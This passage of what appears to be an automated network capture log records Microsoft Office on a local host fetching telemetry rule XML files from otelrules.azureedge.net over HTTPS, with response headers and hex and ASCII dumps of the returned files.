                                                                                                                                                                                            2024-11-20 20:05:59 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:59 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                            x-ms-request-id: bfe6eb71-201e-006e-168c-3abbe3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200559Z-r1d97b995774zjnrhC1TEBv1ww00000009b0000000005qz8
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:59 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            141192.168.2.44993813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:59 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:59 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                            x-ms-request-id: a16a2ddb-901e-0064-058c-3ae8a6000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200559Z-r1d97b99577kk29chC1TEBemmg00000009d0000000008u5b
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:59 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            142192.168.2.44993913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:59 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:59 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                                            x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200559Z-178bfbc474bmqmgjhC1NYCy16c00000000e0000000005fuw
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:59 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            143192.168.2.44994013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:00 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:00 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                            x-ms-request-id: 9dcf90b9-e01e-000c-7364-3b8e36000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200600Z-178bfbc474btrnf9hC1NYCb80g00000000gg00000000kxcg
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:01 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            144192.168.2.44994113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:01 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                            x-ms-request-id: 873207a6-301e-001f-2d8c-3aaa3a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200601Z-1777c6cb7549j9hhhC1TEBzmcc0000000a10000000007zhc
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:01 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            145192.168.2.44994213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:01 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                            x-ms-request-id: 1f0666f4-801e-007b-6865-3be7ab000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200601Z-185f5d8b95cgrrn8hC1NYCgwh40000000ah000000000vqn0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            146192.168.2.44994413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:01 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:01 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                            x-ms-request-id: e332bc5f-001e-000b-6e5c-3b15a7000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200601Z-185f5d8b95cjbkr4hC1NYCeu240000000ag000000000y02c
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:01 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            147192.168.2.44994313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:01 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:02 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                            x-ms-request-id: c1bcbb00-101e-0065-7560-3b4088000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200602Z-178bfbc474bnwsh4hC1NYC2ubs00000000mg0000000042p0
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:02 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            148192.168.2.44994513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:02 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1369
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                            x-ms-request-id: e9975653-d01e-0065-2d8c-3ab77a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200603Z-185f5d8b95cjbkr4hC1NYCeu240000000afg0000000104us
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:06:03 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            149192.168.2.44994613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:06:03 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:06:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:06:03 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                            x-ms-request-id: 39864200-f01e-0071-0968-3b431c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200603Z-178bfbc474btvfdfhC1NYCa2en00000000e0000000005ecb
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
